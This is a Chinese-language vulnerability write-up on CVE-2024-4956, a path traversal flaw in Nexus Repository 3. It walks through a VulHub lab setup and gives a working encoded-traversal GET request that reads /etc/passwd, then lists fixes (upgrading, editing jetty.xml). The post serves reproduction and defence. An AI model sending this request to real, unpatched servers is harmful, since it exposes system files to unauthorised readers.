CVE-2024-4956 Nexus Repository 3 路径遍历漏洞
CVE-2024-4956 Nexus Repository 3 路径遍历漏洞
海狼风暴团队 2025-06-05 09:43
漏洞简述
Nexus Repository 3 在处理用户提供的路径时存在缺陷,仅依赖 Jetty 的基础验证,未进行严格的安全检查。攻击者可构造恶意 URL 进行路径遍历,访问系统上的任意文件。
受影响版本
Nexus Repository 3.0.0 – 3.68.0
漏洞环境搭建
知识扩展
Nexus Repository 3是一个仓库管理工具,用于管理和托管软件构件。它支持集中存储、管理和分发构件,便于团队协作和自动化构建。
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
漏洞环境搭建
1.克隆 VulHub 仓库到本地
git clone https://bgithub.xyz/vulhub/vulhub.git
- 进入到漏洞环境目录
cd vulhub/nexus/CVE-2024-4956
docker-compose up -d
3.靶场搭建成功
漏洞验证
1.访问8081端口
2.burp抓包,修改内容如下:
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
可见,/etc/passwd已被成功读取
修复建议
-
将
Sonatype Nexus Repository 升级到3.68.1或更高版本 -
通过修改jetty.xml文件,禁用对/public路径的访问
修复步骤:
找到
jetty.xml 文件
删除以下行:
<Setname="resourceBase"><Property name="karaf.base"/>/public</Set>
保存文件并重启环境,可以看到防御有效:
– 扫码立即关注 –